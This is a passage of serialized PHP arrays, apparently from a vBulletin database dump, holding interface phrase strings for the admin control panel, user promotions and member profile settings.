Removed\";s:22:\"social_group_x_deleted\";s:27:\"Social Group \'%1$s\' Deleted\";s:21:\"social_group_x_edited\";s:26:\"Social Group \'%1$s\' Edited\";s:30:\"social_group_x_members_managed\";s:35:\"Social Group \'%1$s\' Members Managed\";s:8:\"untitled\";s:8:\"Untitled\";s:25:\"vbulletin_database_errors\";s:25:\"vBulletin Database Errors\";s:9:\"view_logs\";s:9:\"View Logs\";s:22:\"vm_by_x_for_y_approved\";s:41:\"Visitor Message by %1$s for %2$s Approved\";s:20:\"vm_by_x_for_y_edited\";s:39:\"Visitor Message by %1$s for %2$s Edited\";s:21:\"vm_by_x_for_y_removed\";s:40:\"Visitor Message by %1$s for %2$s Removed\";s:26:\"vm_by_x_for_y_soft_deleted\";s:45:\"Visitor Message by %1$s for %2$s Soft Deleted\";s:24:\"vm_by_x_for_y_unapproved\";s:43:\"Visitor Message by %1$s for %2$s Unapproved\";s:23:\"vm_by_x_for_y_undeleted\";s:42:\"Visitor Message by %1$s for %2$s Undeleted\";s:42:\"want_to_access_grant_access_to_this_script\";s:45:\"Want to restrict/grant access to this script?\";}', 'a:208:{s:21:\"add_new_automatic_ban\";s:21:\"Add New Automatic Ban\";s:15:\"add_new_avatars\";s:15:\"Add New Avatars\";s:15:\"add_new_bb_code\";s:15:\"Add New BB Code\";s:16:\"add_new_calendar\";s:16:\"Add New Calendar\";s:16:\"add_new_faq_item\";s:16:\"Add New FAQ Item\";s:13:\"add_new_forum\";s:13:\"Add New Forum\";s:14:\"add_new_plugin\";s:14:\"Add New Plugin\";s:17:\"add_new_post_icon\";s:17:\"Add New Post Icon\";s:18:\"add_new_prefix_set\";s:18:\"Add New Prefix Set\";s:22:\"add_new_scheduled_task\";s:22:\"Add New Scheduled Task\";s:14:\"add_new_smilie\";s:14:\"Add New Smilie\";s:29:\"add_new_social_group_category\";s:29:\"Add New Social Group Category\";s:20:\"add_new_subscription\";s:20:\"Add New Subscription\";s:12:\"add_new_user\";s:12:\"Add New User\";s:29:\"add_new_user_infraction_group\";s:29:\"Add New User Infraction Group\";s:29:\"add_new_user_infraction_level\";s:29:\"Add New User Infraction Level\";s:26:\"add_new_user_profile_field\";s:26:\"Add New User Profile Field\";s:17:\"add_new_user_rank\";s:17:\"Add New User Rank\";s:23:\"add_new_user_reputation\";s:23:\"Add New User Reputation\";s:18:\"add_new_user_title\";s:18:\"Add New User Title\";s:17:\"add_new_usergroup\";s:17:\"Add New Usergroup\";s:14:\"add_paymentapi\";s:19:\"Add New Payment API\";s:7:\"address\";s:7:\"Address\";s:24:\"admin_attention_required\";s:32:\"Administrator Attention Required\";s:18:\"admin_help_manager\";s:18:\"Admin Help Manager\";s:19:\"administrator_notes\";s:19:\"Administrator Notes\";s:11:\"advertising\";s:11:\"Advertising\";s:26:\"album_picture_storage_type\";s:26:\"Album Picture Storage Type\";s:11:\"apc_too_old\";s:212:\"Your server is running a version of the Alternative PHP Cache (APC) that is incompatible with this version of vBulletin. Please upgrade APC to version 3.0.0 or newer.\";s:18:\"attachment_manager\";s:18:\"Attachment Manager\";s:22:\"attachment_permissions\";s:22:\"Attachment Permissions\";s:23:\"attachment_storage_type\";s:23:\"Attachment Storage Type\";s:16:\"attachment_usage\";s:16:\"Attachment Usage\";s:31:\"attachments_awaiting_moderation\";s:23:\"Attachments to Moderate\";s:14:\"avatar_manager\";s:14:\"Avatar Manager\";s:8:\"ban_user\";s:8:\"Ban User\";s:15:\"bb_code_manager\";s:15:\"BB Code Manager\";s:20:\"business_development\";s:20:\"Business Development\";s:16:\"calendar_manager\";s:16:\"Calendar Manager\";s:20:\"calendar_permissions\";s:20:\"Calendar Permissions\";s:9:\"calendars\";s:9:\"Calendars\";s:12:\"collapse_all\";s:12:\"Collapse All\";s:14:\"collapse_group\";s:14:\"Collapse Group\";s:16:\"community_forums\";s:16:\"Community Forums\";s:18:\"control_panel_home\";s:18:\"Control Panel Home\";s:24:\"copyright_enforcement_by\";s:24:\"Copyright Enforcement By\";s:16:\"could_not_open_x\";s:57:\"Fatal Error Could not open %1$s \";s:40:\"currently_x_customized_templates_updated\";s:265:\"There are currently %1$s customized template(s) that need to be updated or reverted. Some sections of vBulletin may not function if you do not do this! \r\n \r\nClick here to view these templates! \";s:19:\"custom_avatar_usage\";s:12:\"Avatar Usage\";s:15:\"custom_bb_codes\";s:15:\"Custom BB Codes\";s:28:\"custom_profile_picture_usage\";s:21:\"Profile Picture Usage\";s:19:\"database_data_usage\";s:10:\"Data Usage\";s:20:\"database_index_usage\";s:11:\"Index Usage\";s:7:\"dismiss\";s:7:\"Dismiss\";s:23:\"download_latest_version\";s:23:\"Download Latest Version\";s:25:\"download_upload_languages\";s:27:\"Download / Upload Languages\";s:23:\"download_upload_plugins\";s:25:\"Download / Upload Plugins\";s:22:\"download_upload_styles\";s:24:\"Download / Upload Styles\";s:38:\"download_vbulletin_x_from_members_area\";s:60:\"Click here to download vBulletin %1$s from the Members\' Area\";s:9:\"due_tasks\";s:9:\"Due Tasks\";s:21:\"duplicate_permissions\";s:21:\"Duplicate Permissions\";s:20:\"eaccelerator_too_old\";s:56:\"eAccelerator for PHP must be upgraded to 0.9.3 or newer.\";s:26:\"events_awaiting_moderation\";s:18:\"Events to Moderate\";s:12:\"expand_group\";s:12:\"Expand Group\";s:11:\"faq_manager\";s:11:\"FAQ Manager\";s:21:\"file_uploads_disabled\";s:21:\"FILE_UPLOADS Disabled\";s:20:\"find_updated_phrases\";s:20:\"Find Updated Phrases\";s:22:\"find_updated_templates\";s:22:\"Find Updated Templates\";s:15:\"forum_home_page\";s:15:\"Forum Home Page\";s:13:\"forum_manager\";s:13:\"Forum Manager\";s:17:\"forum_permissions\";s:17:\"Forum Permissions\";s:21:\"forums_and_moderators\";s:23:\"Forums & Moderators\";s:14:\"google_adsense\";s:14:\"Google AdSense\";s:20:\"graphics_development\";s:20:\"Graphics Development\";s:15:\"holiday_manager\";s:15:\"Holiday Manager\";s:18:\"human_verification\";s:18:\"Human Verification\";s:26:\"human_verification_manager\";s:26:\"Human Verification Manager\";s:16:\"language_manager\";s:16:\"Language Manager\";s:9:\"languages\";s:9:\"Languages\";s:21:\"languages_and_phrases\";s:23:\"Languages & Phrases\";s:26:\"latest_version_available_x\";s:30:\"Latest version available: %1$s\";s:11:\"log_manager\";s:11:\"Log Manager\";s:15:\"manage_products\";s:15:\"Manage Products\";s:12:\"members_area\";s:13:\"Members\' Area\";s:11:\"merge_users\";s:11:\"Merge Users\";s:28:\"messages_awaiting_moderation\";s:20:\"Messages to Moderate\";s:21:\"mmcache_not_supported\";s:99:\"Turck MMCache has been made obsolete by eAccelerator and does not function properly with vBulletin.\";s:20:\"moderate_attachments\";s:20:\"Moderate Attachments\";s:15:\"moderate_events\";s:15:\"Moderate Events\";s:14:\"moderate_posts\";s:14:\"Moderate Posts\";s:19:\"moderate_signatures\";s:19:\"Moderate Signatures\";s:16:\"moderate_threads\";s:16:\"Moderate Threads\";s:14:\"moderate_users\";s:14:\"Moderate Users\";s:25:\"moderate_visitor_messages\";s:25:\"Moderate Visitor Messages\";s:21:\"mysql_language_lookup\";s:21:\"MySQL Language Lookup\";s:21:\"mysql_max_packet_size\";s:17:\"MySQL Packet Size\";s:25:\"mysql_running_strict_mode\";s:261:\"MySQL is running in strict mode. While you may proceed, some areas of vBulletin may not function properly. It is strongly recommended that you set $config[\'Database\'][\'force_sql_mode\']
to true
in your includes/config.php file!\";s:25:\"mysql_strict_mode_warning\";s:25:\"MySQL Strict Mode Warning\";s:13:\"mysql_version\";s:13:\"MySQL Version\";s:15:\"new_posts_today\";s:15:\"New Posts Today\";s:17:\"new_threads_today\";s:17:\"New Threads Today\";s:15:\"new_users_today\";s:15:\"New Users Today\";s:18:\"news_header_string\";s:20:\"For Your Information\";s:17:\"no_frames_support\";s:63:\"Your browser does not support frames. Please get one that does!\";s:24:\"other_contributions_from\";s:24:\"Other Contributions From\";s:34:\"out_of_date_custom_templates_found\";s:35:\"Out-of-Date Custom Templates Found!\";s:18:\"paymentapi_manager\";s:19:\"Payment API Manager\";s:19:\"php_function_lookup\";s:19:\"PHP Function Lookup\";s:17:\"php_max_post_size\";s:17:\"PHP Max Post Size\";s:19:\"php_max_upload_size\";s:23:\"PHP Maximum Upload Size\";s:16:\"php_memory_limit\";s:16:\"PHP Memory Limit\";s:14:\"phrase_manager\";s:14:\"Phrase Manager\";s:51:\"please_note_deleting_this_item_will_remove_children\";s:87:\"Please note : deleting this item will also remove any child entries of this item.\";s:14:\"plugin_manager\";s:14:\"Plugin Manager\";s:16:\"plugins_products\";s:22:\"Plugins & Products\";s:17:\"post_icon_manager\";s:17:\"Post Icon Manager\";s:21:\"post_new_announcement\";s:21:\"Post New Announcement\";s:25:\"posts_awaiting_moderation\";s:17:\"Posts to Moderate\";s:26:\"private_message_statistics\";s:26:\"Private Message Statistics\";s:31:\"problematic_php_optimizer_found\";s:31:\"Problematic PHP Optimizer Found\";s:15:\"product_manager\";s:15:\"Product Manager\";s:19:\"prune_social_groups\";s:19:\"Prune Social Groups\";s:11:\"prune_users\";s:18:\"Prune / Move Users\";s:25:\"quick_administrator_links\";s:25:\"Quick Administrator Links\";s:21:\"quick_moderator_links\";s:21:\"Quick Moderator Links\";s:19:\"quick_phrase_finder\";s:19:\"Quick Phrase Finder\";s:17:\"quick_user_finder\";s:17:\"Quick User Finder\";s:17:\"rebuild_bitfields\";s:17:\"Rebuild Bitfields\";s:18:\"rebuild_thumbnails\";s:18:\"Rebuild Thumbnails\";s:16:\"reference_manual\";s:16:\"Reference Manual\";s:9:\"referrals\";s:9:\"Referrals\";s:22:\"repair_optimize_tables\";s:24:\"Repair / Optimize Tables\";s:28:\"replacement_variable_manager\";s:28:\"Replacement Variable Manager\";s:12:\"revert_prefs\";s:12:\"Revert Prefs\";s:9:\"rss_feeds\";s:9:\"RSS Feeds\";s:9:\"safe_mode\";s:9:\"Safe Mode\";s:22:\"scheduled_task_manager\";s:22:\"Scheduled Task Manager\";s:15:\"scheduled_tasks\";s:15:\"Scheduled Tasks\";s:16:\"search_for_users\";s:16:\"Search for Users\";s:17:\"search_in_phrases\";s:17:\"Search in Phrases\";s:19:\"search_in_templates\";s:19:\"Search in Templates\";s:19:\"search_ip_addresses\";s:19:\"Search IP Addresses\";s:20:\"search_social_groups\";s:20:\"Search Social Groups\";s:11:\"search_type\";s:11:\"Search Type\";s:19:\"send_email_to_users\";s:19:\"Send Email to Users\";s:20:\"server_load_averages\";s:20:\"Server Load Averages\";s:11:\"server_type\";s:11:\"Server Type\";s:19:\"show_all_moderators\";s:19:\"Show All Moderators\";s:13:\"show_all_news\";s:13:\"Show All News\";s:14:\"smilie_manager\";s:14:\"Smilie Manager\";s:23:\"social_group_categories\";s:23:\"Social Group Categories\";s:17:\"social_group_icon\";s:17:\"Social Group Icon\";s:30:\"social_group_icon_storage_type\";s:30:\"Social Group Icon Storage Type\";s:21:\"software_developed_by\";s:21:\"Software Developed By\";s:20:\"software_development\";s:20:\"Software Development\";s:19:\"statistics_and_logs\";s:21:\"Statistics & Logs\";s:10:\"strip_poll\";s:10:\"Strip Poll\";s:13:\"style_manager\";s:13:\"Style Manager\";s:20:\"styles_and_templates\";s:22:\"Styles & Templates\";s:20:\"subscription_manager\";s:20:\"Subscription Manager\";s:24:\"subscription_permissions\";s:24:\"Subscription Permissions\";s:30:\"sure_you_want_to_log_out_of_cp\";s:54:\"Are you sure you want to log out of the control panel?\";s:18:\"test_communication\";s:18:\"Test Communication\";s:34:\"there_is_a_newer_vbulletin_version\";s:59:\"There is a newer version of vBulletin available to download\";s:21:\"thread_prefix_manager\";s:21:\"Thread Prefix Manager\";s:15:\"thread_prefixes\";s:15:\"Thread Prefixes\";s:17:\"threads_and_posts\";s:19:\"Threads & Posts\";s:27:\"threads_awaiting_moderation\";s:19:\"Threads to Moderate\";s:15:\"transaction_log\";s:15:\"Transaction Log\";s:25:\"transaction_log_and_stats\";s:27:\"Transaction Log & Stats\";s:17:\"transaction_stats\";s:17:\"Transaction Stats\";s:32:\"unique_registered_visitors_today\";s:20:\"Unique Members Today\";s:15:\"update_counters\";s:15:\"Update Counters\";s:13:\"upload_avatar\";s:13:\"Upload Avatar\";s:16:\"upload_post_icon\";s:16:\"Upload Post Icon\";s:13:\"upload_smilie\";s:13:\"Upload Smilie\";s:12:\"useful_links\";s:12:\"Useful Links\";s:11:\"user_albums\";s:11:\"User Albums\";s:29:\"user_infraction_level_manager\";s:29:\"User Infraction Level Manager\";s:23:\"user_infraction_manager\";s:23:\"User Infraction Manager\";s:16:\"user_infractions\";s:16:\"User Infractions\";s:29:\"user_profile_field_categories\";s:29:\"User Profile Field Categories\";s:26:\"user_profile_field_manager\";s:26:\"User Profile Field Manager\";s:17:\"user_rank_manager\";s:17:\"User Rank Manager\";s:10:\"user_ranks\";s:10:\"User Ranks\";s:23:\"user_reputation_manager\";s:23:\"User Reputation Manager\";s:16:\"user_reputations\";s:16:\"User Reputations\";s:18:\"user_title_manager\";s:18:\"User Title Manager\";s:11:\"user_titles\";s:11:\"User Titles\";s:17:\"usergroup_manager\";s:17:\"Usergroup Manager\";s:20:\"userpic_storage_type\";s:25:\"User Picture Storage Type\";s:25:\"users_awaiting_moderation\";s:17:\"Users to Moderate\";s:12:\"users_online\";s:12:\"Users Online\";s:31:\"users_online_x_members_y_guests\";s:48:\"%1$s Users Online (%2$s members and %3$s guests)\";s:37:\"vbulletin_developers_and_contributors\";s:39:\"vBulletin Developers & Contributors\";s:16:\"vbulletin_news_x\";s:20:\"vBulletin News: %1$s\";s:17:\"view_banned_users\";s:17:\"View Banned Users\";s:16:\"view_infractions\";s:16:\"View Infractions\";s:16:\"view_permissions\";s:16:\"View Permissions\";s:13:\"view_php_info\";s:13:\"View PHP Info\";s:14:\"view_reminders\";s:14:\"View Reminders\";s:10:\"web_server\";s:10:\"Web Server\";s:44:\"welcome_to_the_vbulletin_admin_control_panel\";s:44:\"Welcome to the vBulletin Admin Control Panel\";s:48:\"welcome_to_the_vbulletin_moderator_control_panel\";s:48:\"Welcome to the vBulletin Moderator Control Panel\";s:20:\"x_y_members_z_guests\";s:35:\"%1$s (%2$s members and %3$s guests)\";s:35:\"you_are_running_vbulletin_version_x\";s:48:\"You are currently running vBulletin version %1$s\";s:20:\"you_have_x_tasks_due\";s:38:\"You have %1$s tasks now due or overdue\";s:39:\"your_version_of_vbulletin_is_up_to_date\";s:47:\"Your version of vBulletin (%1$s) is up-to-date.\";}', 'a:20:{s:17:\"add_new_promotion\";s:17:\"Add New Promotion\";s:15:\"edit_promotions\";s:15:\"Edit Promotions\";s:19:\"greater_or_equal_to\";s:19:\"Greater or Equal to\";s:9:\"less_than\";s:9:\"Less Than\";s:22:\"move_user_to_usergroup\";s:22:\"Move User to Usergroup\";s:34:\"move_user_to_usergroup_description\";s:108:\"Jumping is evaluated based on the time period defined in the Scheduled Tasks section (Default: Every 1 Hour)\";s:18:\"promotion_strategy\";s:18:\"Promotion Strategy\";s:19:\"promotion_strategy1\";s:29:\"Posts and Reputation and Date\";s:19:\"promotion_strategy2\";s:27:\"Posts or Reputation or Date\";s:19:\"promotion_strategy3\";s:30:\"(Posts and Reputation) or Date\";s:19:\"promotion_strategy4\";s:30:\"Posts and (Reputation or Date)\";s:19:\"promotion_strategy5\";s:30:\"(Posts or Reputation) and Date\";s:19:\"promotion_strategy6\";s:30:\"Posts or (Reputation and Date)\";s:19:\"promotion_strategy7\";s:30:\"Reputation and (Posts or Date)\";s:19:\"promotion_strategy8\";s:30:\"Reputation or (Posts and Date)\";s:30:\"promotion_strategy_description\";s:61:\"Choose the way that you wish the above values to be evaluated\";s:14:\"promotion_type\";s:14:\"Promotion Type\";s:45:\"promotion_type_description_primary_additional\";s:225:\"Type of promotion that the user is to receive. Select \'Primary Usergroup \' to change the user\'s main usergroup to this group or select \'Additional Usergroups \' to add this group to the user\'s additional usergroups\";s:26:\"reputation_comparison_type\";s:26:\"Reputation Comparison Type\";s:31:\"reputation_comparison_type_desc\";s:139:\"This option only applies to reputation and only when reputation has been selected as part of the Promotion Strategy above.\";}', 'a:526:{s:8:\"about_me\";s:8:\"About Me\";s:7:\"about_x\";s:10:\"About %1$s\";s:28:\"accept_pm_only_from_contacts\";s:243:\"You may limit the receipt of private messages to just moderators and your contacts . Other members who attempt to send messages to you will be told that you have disabled private messaging.\";s:31:\"accept_selected_friend_requests\";s:31:\"Accept selected friend requests\";s:21:\"activate_your_account\";s:21:\"Activate Your Account\";s:15:\"activation_code\";s:15:\"Activation Code\";s:9:\"add_album\";s:9:\"Add Album\";s:11:\"add_contact\";s:11:\"Add Contact\";s:10:\"add_friend\";s:10:\"Add Friend\";s:23:\"add_member_to_your_list\";s:28:\"Add a Member to Your List...\";s:20:\"add_new_user_to_list\";s:20:\"Add New User to List\";s:15:\"add_to_contacts\";s:15:\"Add to Contacts\";s:19:\"add_to_friends_list\";s:19:\"Add to Friends List\";s:18:\"add_to_ignore_list\";s:18:\"Add to Ignore List\";s:25:\"add_x_to_contacts_confirm\";s:51:\"Are you sure you want to add %1$s to your contacts?\";s:20:\"add_x_to_ignore_list\";s:28:\"Add %1$s to Your Ignore List\";s:27:\"add_x_to_ignorelist_confirm\";s:54:\"Are you sure you want to add %1$s to your ignore list?\";s:22:\"additional_information\";s:22:\"Additional Information\";s:16:\"additional_users\";s:16:\"Additional Users\";s:29:\"administrators_may_send_email\";s:166:\"From time to time, the administrators may want to send you email notices. \r\n \r\n If you do not want to receive these notices, disable this option.\";s:15:\"aim_screen_name\";s:15:\"AIM Screen Name\";s:14:\"album_pictures\";s:14:\"Album Pictures\";s:6:\"albums\";s:6:\"Albums\";s:19:\"albums_created_by_x\";s:22:\"Albums Created by %1$s\";s:3:\"all\";s:3:\"All\";s:27:\"allow_daylight_savings_time\";s:109:\"In addition, you may set the appropriate option to allow for daylight savings time in your part of the world.\";s:28:\"allow_members_send_you_email\";s:55:\"You can allow other members to send you email messages.\";s:20:\"allow_vcard_download\";s:20:\"Allow vCard Download\";s:27:\"also_remove_x_from_contacts\";s:35:\"Also remove %1$s from your contacts\";s:29:\"also_send_friend_request_to_x\";s:34:\"Also send a friend request to %1$s\";s:25:\"anyone_free_to_join_group\";s:37:\"Anyone is free to join this usergroup\";s:16:\"approve_messages\";s:16:\"Approve Messages\";s:23:\"attachments_posted_by_x\";s:26:\"Attachments Posted by %1$s\";s:33:\"automatically_detect_dst_settings\";s:33:\"Automatically detect DST settings\";s:6:\"avatar\";s:6:\"Avatar\";s:15:\"avatar_category\";s:15:\"Avatar Category\";s:28:\"avatars_small_graphics_short\";s:84:\"Avatars are small graphics that are displayed under your username whenever you post.\";s:25:\"background_images_album_x\";s:132:\"Background images must come from your albums . Enter the URL to a picture in one of your public or profile albums.\";s:28:\"basic_editor_simple_text_box\";s:32:\"Basic Editor - A simple text box\";s:10:\"birth_date\";s:13:\"Date of Birth\";s:8:\"birthday\";s:8:\"Birthday\";s:21:\"block_display_options\";s:305:\"If you would like to restrict the display of some of the blocks on your profile page, select a minimum relationship that other users must meet to see the blocks. \r\n \r\nNote: Guests and users on your Ignore List will only be able to view the blocks on your page where you have selected \'Everyone\'.\";s:31:\"board_can_be_shown_any_language\";s:154:\"Although the forum cannot translate the actual contents of messages, all the controls and help text can be shown to you in any of the following languages.\";s:14:\"board_language\";s:14:\"Forum Language\";s:10:\"board_skin\";s:10:\"Forum Skin\";s:16:\"break_friendship\";s:16:\"Break Friendship\";s:30:\"browsing_when_receive_pm_popup\";s:145:\"If you are browsing the forums when you receive a new private message, the system can pop-up a notification box informing you of the new message.\";s:27:\"can_automatically_subscribe\";s:228:\"When you post a new thread, or reply to a topic, you can choose to automatically add that thread to your list of subscribed threads , with the option to receive email notification of new replies to that thread.\";s:27:\"can_email_when_sends_you_pm\";s:106:\"The forum can send a message to your email address to inform you when someone sends you a private message.\";s:26:\"cannot_leave_primary_group\";s:26:\"Cannot leave primary group\";s:26:\"choose_thread_display_mode\";s:133:\"Here you can choose the display mode for threads. For a full explanation of the modes, please view this help page .\";s:5:\"clear\";s:5:\"Clear\";s:9:\"clear_all\";s:9:\"Clear All\";s:29:\"click_button_below_edit_email\";s:126:\"Please click the button below to edit your email address and password. Any changes you\'ve made on this page will not be saved.\";s:21:\"click_here_to_email_x\";s:24:\"Click Here to Email %1$s\";s:27:\"click_save_to_add_x_to_list\";s:103:\"Click the \'Save List\' button to add %1$s to this list, or click your browser\'s \'Back\' button to cancel.\";s:5:\"close\";s:5:\"Close\";s:7:\"comment\";s:7:\"Comment\";s:26:\"confirm_friendship_request\";s:26:\"Confirm Friendship Request\";s:33:\"confirm_friendship_request_from_x\";s:62:\"Are you sure you want to confirm %1$s\'s request to be friends?\";s:25:\"confirm_new_email_address\";s:25:\"Confirm New Email Address\";s:20:\"confirm_new_password\";s:20:\"Confirm New Password\";s:30:\"confirm_user_list_modification\";s:30:\"Confirm User List Modification\";s:32:\"contact_admin_to_modify_birthday\";s:67:\"Please contact the Administrator if your date of birth has changed.\";s:12:\"contact_info\";s:12:\"Contact Info\";s:21:\"contacts_instructions\";s:252:\"To remove a user from your contacts, un-check the box associated with their avatar and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click \'Add Contact\' to add them to your list.\";s:13:\"control_panel\";s:13:\"Control Panel\";s:28:\"conversation_between_x_and_y\";s:34:\"Conversation Between %1$s and %2$s\";s:17:\"coppa_information\";s:17:\"COPPA Information\";s:16:\"current_activity\";s:16:\"Current Activity\";s:24:\"current_password_expired\";s:56:\"Your current password has expired. Please change it now.\";s:37:\"current_reputation_level_is_displayed\";s:220:\"Your current reputation level is displayed to other users whenever you post a message. If you would like to hide your reputation, disable this option. \r\n \r\n You currently have %1$s reputation points.\";s:17:\"current_sig_image\";s:23:\"Current signature image\";s:40:\"currently_using_x_to_store_y_attachments\";s:64:\"You are currently using %1$s to store %2$s uploaded attachments.\";s:13:\"custom_avatar\";s:13:\"Custom Avatar\";s:22:\"custom_profile_picture\";s:22:\"Custom Profile Picture\";s:17:\"custom_user_title\";s:17:\"Custom User Title\";s:17:\"customize_profile\";s:17:\"Customize Profile\";s:17:\"date_time_options\";s:23:\"Date & Time Options\";s:26:\"default_thread_age_cut_off\";s:26:\"Default Thread Age Cut Off\";s:32:\"default_thread_subscription_mode\";s:32:\"Default Thread Subscription Mode\";s:20:\"delete_current_image\";s:21:\"Delete current image?\";s:15:\"delete_messages\";s:15:\"Delete Messages\";s:19:\"deleted_discussions\";s:19:\"Deleted Discussions\";s:13:\"deleted_items\";s:13:\"Deleted Items\";s:16:\"deleted_messages\";s:16:\"Deleted Messages\";s:24:\"deleted_picture_comments\";s:24:\"Deleted Picture Comments\";s:13:\"deleted_posts\";s:13:\"Deleted Posts\";s:32:\"deleted_social_group_discussions\";s:32:\"Deleted Social Group Discussions\";s:29:\"deleted_social_group_messages\";s:29:\"Deleted Social Group Messages\";s:15:\"deleted_threads\";s:15:\"Deleted Threads\";s:24:\"deleted_visitor_messages\";s:24:\"Deleted Visitor Messages\";s:14:\"deleted_within\";s:14:\"Deleted within\";s:12:\"deselect_all\";s:29:\"Deselect All\";s:21:\"deselect_all_messages\";s:21:\"Deselect All Messages\";s:7:\"details\";s:7:\"Details\";s:10:\"discussion\";s:10:\"Discussion\";s:12:\"discussion_x\";s:35:\"Discussion: %2$s \";s:11:\"discussions\";s:11:\"Discussions\";s:11:\"display_age\";s:16:\"Display Only Age\";s:19:\"display_age_and_dob\";s:34:\"Display Age and Full Date of Birth\";s:21:\"display_day_and_month\";s:35:\"Display Only Day and Month of Birth\";s:24:\"display_permissions_form\";s:24:\"Display Permissions Form\";s:16:\"do_not_subscribe\";s:16:\"Do not subscribe\";s:20:\"do_not_use_an_avatar\";s:20:\"Do not use an avatar\";s:14:\"download_vcard\";s:14:\"Download vCard\";s:21:\"dst_correction_option\";s:21:\"DST Correction Option\";s:26:\"dst_corrections_always_off\";s:26:\"DST corrections always off\";s:25:\"dst_corrections_always_on\";s:25:\"DST corrections always on\";s:18:\"edit_email_address\";s:18:\"Edit Email Address\";s:23:\"edit_email_and_password\";s:25:\"Edit Email & Password\";s:16:\"edit_ignore_list\";s:16:\"Edit Ignore List\";s:13:\"edit_password\";s:13:\"Edit Password\";s:17:\"edit_user_profile\";s:17:\"Edit User Profile\";s:13:\"edit_value_js\";s:10:\"Edit Value\";s:20:\"edit_visitor_message\";s:20:\"Edit Visitor Message\";s:18:\"edit_your_about_me\";s:20:\"Edit your \"About Me\"\";s:22:\"edit_your_friends_list\";s:22:\"Edit Your Friends List\";s:22:\"email_activation_codes\";s:22:\"Email Activation Codes\";s:18:\"email_and_password\";s:20:\"Email & Password\";s:20:\"empty_current_folder\";s:20:\"Empty Current Folder\";s:24:\"enable_private_messaging\";s:24:\"Enable Private Messaging\";s:24:\"enable_visitor_messaging\";s:24:\"Enable Visitor Messaging\";s:26:\"enhanced_interface_wysiwyg\";s:41:\"Enhanced Interface - Full WYSIWYG Editing\";s:26:\"enter_password_to_continue\";s:39:\"Enter your present password to continue\";s:18:\"enter_url_to_image\";s:56:\"Option 1 - Enter the URL to the Image on Another Website\";s:32:\"entering_message_three_interface\";s:504:\"When posting messages to the forums or other members, there are three interface types available to you. The simplest of these is a simple text box, while the last is a fully-fledged WYSIWYG editor, which allows you to format your text as you want it and see the results immediately. \r\n \r\n Depending upon the capabilities of your web browser, you may not be able to use all of these options. If you experience problems when posting messages, try switching to a different interface type.\";s:8:\"everyone\";s:8:\"Everyone\";s:7:\"expired\";s:7:\"Expired\";s:7:\"expires\";s:7:\"Expires\";s:33:\"features_private_messaging_system\";s:247:\"This forum features a private messaging system , which allows members to send messages to one another privately. \r\n \r\nIf you do not want to send or receive private messages, you may disable the private messaging system.\";s:33:\"features_visitor_messaging_system\";s:232:\"This forum features a visitor messaging system that allows members to send messages to one another publicly. If you do not want to receive visitor messages, you may disable the visitor messaging system.\";s:29:\"find_all_threads_started_by_x\";s:32:\"Find all threads started by %1$s\";s:24:\"find_people_on_your_list\";s:24:\"Find People on Your List\";s:10:\"find_posts\";s:10:\"Find Posts\";s:34:\"following_groups_available_to_join\";s:50:\"The following groups are available for you to join\";s:10:\"forum_info\";s:10:\"Forum Info\";s:19:\"friend_request_list\";s:19:\"Friend Request List\";s:7:\"friends\";s:7:\"Friends\";s:20:\"friends_instructions\";s:302:\"To remove a user from your contacts, un-check the box associated with their avatar and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click either \'Contact\' to add them to your list, or \'Friend\' to also send a friendship request.\";s:20:\"friendship_requested\";s:20:\"Friendship Requested\";s:14:\"from_this_page\";s:18:\"From this Page ...\";s:19:\"general_information\";s:19:\"General Information\";s:15:\"give_infraction\";s:15:\"Give Infraction\";s:13:\"group_content\";s:13:\"Group Content\";s:13:\"group_created\";s:7:\"Created\";s:17:\"group_discussions\";s:17:\"Group Discussions\";s:13:\"group_leaders\";s:13:\"Group leaders\";s:13:\"group_members\";s:7:\"Members\";s:17:\"group_memberships\";s:17:\"Group Memberships\";s:14:\"group_messages\";s:14:\"Group Messages\";s:10:\"group_name\";s:10:\"Group Name\";s:7:\"group_x\";s:30:\"Group: %2$s \";s:29:\"have_custom_avatar_want_as_is\";s:93:\"If you have a custom avatar and want to keep it as it is, leave the fields below as they are.\";s:16:\"hide_age_and_dob\";s:26:\"Hide Age and Date of Birth\";s:24:\"hide_user_customizations\";s:24:\"Hide User Customizations\";s:9:\"home_page\";s:9:\"Home Page\";s:13:\"home_page_url\";s:13:\"Home Page URL\";s:10:\"icq_number\";s:10:\"ICQ Number\";s:27:\"identify_as_member_of_group\";s:37:\"Identify me as a member of this group\";s:26:\"if_under_13_provide_parent\";s:88:\"If you are aged under 13, you must provide the email address of your parent or guardian.\";s:11:\"ignore_list\";s:11:\"Ignore List\";s:13:\"ignored_users\";s:13:\"Ignored Users\";s:23:\"ignorelist_instructions\";s:221:\"To remove a user from your ignore list, un-check the box associated with their name and click the \'Save Changes\' button. \r\n \r\nTo add a user to the list, enter their name into the empty text box and click \'Okay\'.\";s:31:\"including_attached_and_img_code\";s:50:\"including attached images and images in [IMG] code\";s:36:\"incoming_friend_requests_description\";s:50:\"The following members want to be friends with you:\";s:24:\"insert_signature_picture\";s:24:\"Insert Signature Picture\";s:7:\"instant\";s:7:\"Instant\";s:16:\"invert_selection\";s:33:\"Invert Selection\";s:14:\"invisible_mode\";s:14:\"Invisible Mode\";s:21:\"invisible_mode_allows\";s:103:\"Invisible mode allows you to browse the forums without appearing in the \'Currently Active Users\' lists.\";s:2:\"ip\";s:2:\"IP\";s:10:\"join_group\";s:10:\"Join Group\";s:18:\"join_social_groups\";s:18:\"Join Social Groups\";s:18:\"joining_conditions\";s:18:\"Joining Conditions\";s:9:\"last_note\";s:9:\"Last Note\";s:10:\"last_visit\";s:10:\"Last Visit\";s:15:\"last_x_visitors\";s:45:\"The last %1$s visitor(s) to this page were:\r\n\";s:27:\"latest_infractions_received\";s:27:\"Latest Infractions Received\";s:26:\"latest_reputation_received\";s:26:\"Latest Reputation Received\";s:20:\"leader_of_this_group\";s:30:\"You are a leader of this group\";s:11:\"leave_group\";s:11:\"Leave Group\";s:27:\"let_other_visitors_know_url\";s:102:\"If you would like to let other visitors to this site know the URL of your own web site, enter it here.\";s:25:\"limit_vm_to_contacts_only\";s:58:\"Limit usage of Visitor Messages to Contacts and Moderators\";s:6:\"linear\";s:6:\"Linear\";s:12:\"list_members\";s:12:\"List Members\";s:13:\"login_privacy\";s:19:\"Login & Privacy\";s:28:\"make_changes_parent_notified\";s:287:\"When you make changes to this profile, your Parent / Guardian will be notified by email. \r\n \r\n If you are over the age of 13, you should not 